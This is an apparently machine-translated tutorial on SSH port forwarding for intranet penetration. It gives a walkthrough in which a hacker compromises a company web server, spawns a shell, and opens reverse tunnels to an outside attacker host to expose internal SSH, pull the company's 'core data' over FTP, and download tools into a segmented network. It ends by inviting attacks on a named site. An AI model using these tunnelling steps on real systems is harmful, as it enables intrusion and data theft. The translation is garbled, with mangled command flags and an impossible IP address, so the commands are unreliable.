The skillful use of SSH in intranet penetration ring04h

In the process of penetration testing, often encountered in the following situations, the internal network host through the router or security equipment to do the access control, access to the local open service directly through the Internet, windows, The domestic usually chooses Lcx.exe to carry on the port forwarding, in the application aspect majority also will choose Reduh to carry on the port forwarding, but *nix very few people use the system to bring the SSH, iptables itself to handle this kind of problem.

Because time is limited, this article only detailed introduction SSH tunnel aspect knowledge, iptables is free to add.

Three port forwarding commands for SSH:
Ssh-c-f-n-g-l Listen_port:DST_Host:DST_port user@tunnel_host
Ssh-c-f-n-g-r Listen_port:DST_Host:DST_port user@tunnel_host
Ssh-c-f-n-g-d Listen_port user@tunnel_host

-F Fork into background after authentication.
Background authenticated user/password, usually used with-N, do not log on to the remote host.

-P Port Connect to this port. The Server must is on the same port.
The SSHD service port of the logged on SSD server.

-L Port:host:hostport
Forwards a port on the local machine (client) to the specified port on the remote specified machine. How it works is that a socket on the local machine is assigned to listen on the port, and once connected on the port, the connection is forwarded through a secure channel, while the remote host and the host's Hostport port are connected. You can specify the forwarding of ports in the configuration file. Only Root can forward privileged ports. The IPV6 address is described in another format: Port/host/hostport

-R Port:host:hostport
Forwards a port on a remote host (server) to the specified port on the local-side specified machine. How it works is that a socket on the remote host is assigned to listen on port ports, and once a connection is made on the port, the connection is diverted through a secure channel, while the local host and host Hostport ports are connected. You can specify the forwarding of ports in the configuration file. You must log on to a remote host with Root to forward privileged ports. The IPV6 address is described in another format: Port/host/hostport

-D Port
Specifies a local machine "dynamic" Application port forwarding. How it works is that a socket on the local machine is assigned to listen to the port, and once a connection is made on the port, the connection is forwarded through a secure channel, depending on the protocol of the application to determine where the remote host will be connected. Currently supports the SOCKS4 protocol and will act as a SOCKS4 server. Only Root can forward privileged ports. You can specify the forwarding of dynamic ports in the configuration file.

-C Enable compression.
Compressed data transfer.

-N does not execute a shell or command.
Scripts or commands are not executed, and are usually used with-F.

-G Allow remote hosts to connect to forwarded ports.
In the-l/-r/-d parameter, the remote host is allowed to connect to the established forwarding port, and if this argument is not added, only the local host is allowed to establish a connection. Note: This parameter does not always seem to work in practice.

If you want to learn more about SSH details, you can either man ssh, or refer to the SSH doc.

Instance:
——————————————————————————
When hacker a from the Internet invaded the Risun enterprise of a server, the machine name is Gboss_web
Gboss_web Information:
External network ip:255.25.55.111
Intranet ip:10.168.0.10
The network architecture mode is that the route maps the 80 ports of the extranet 256.25.56.111 to the 80 ports of the intranet 10.168.0.10.

Hacker a succeeds in inheriting the Gboss_web httpd permissions by exploiting the 80-port Open Service Web Script Vulnerability and then creating a socket in Perl or other language to obtain a remote SH shell. Because back shell may be unstable, or inconvenient to use, you can use SSH to build a tunnel, the Gboss_web server on the 22-port map to the hacker's local (this article for the demonstration of the aircraft for the 0x.cn);

By getting the SH shell, execute $python-C ' Import Pty; Pty.spawn ("/bin/sh") ' obtains a ttyshell (because SSH wants TTY support), and then maps the Gboss_web server's 22 port to 202.65.208.142 44 port via the following command;
$ssh-C-f-n-g-r 44:127.0.0.1:22 ring04h@202.65.208.142
This allows you to log on to the 0x.cn SSH service, ssh-p 44 127.0.0.1 equivalent to 22 ports connected to Gboss_web.

Hacker A through the use of operating system to elevate the permissions to root, and then continue to penetrate the process, found that there is another name of the intranet Gboss_app server.
Gboss_app Information:
Intranet ip:10.168.0.20

Hackers through the sniffer to obtain Gboss_app server FTP information, Gboss_app server FTP save Risun Enterprise core data, due to the large amount of data, the need for FTP to continue to pass the function, can be mapped through SSH Gboss_ App's 21-port to 0x.cn 2121-port;
$ssh-C-f-n-g-r 2121:10.168.0.20:21 ring04h@202.65.208.142

When the hacker successfully root off the network in another segment of the server Bill_app, need to download some tools from the extranet, due to internal access control strategy, Bill_app can not connect to the network, at this time, through the map extranet server 0x.cn 80 port to gboss_web 8888 Port, And then through the Gboss_web built tunnel, download the required tools.
Executing on the Gboss_web server:
$SSH-C-f-n-G user@10.168.0.10-l 8888:202.65.208.142:80

After establishing the tunnel, the execution of wget Http://10.168.0.10:8888/thepl on the Bill_app is equivalent to visiting HTTP://202.65.208.142/THEPL

This article detailed outline how to establish the tunnel process, as well as the correlation parameter use method, everybody understands the master to be able to float directly.
The hacker in this paper uses the address of real IP, corresponding domain name: http://0x.cn welcome boring hackers to destroy. (SSH has a hidden password, it's easy ...)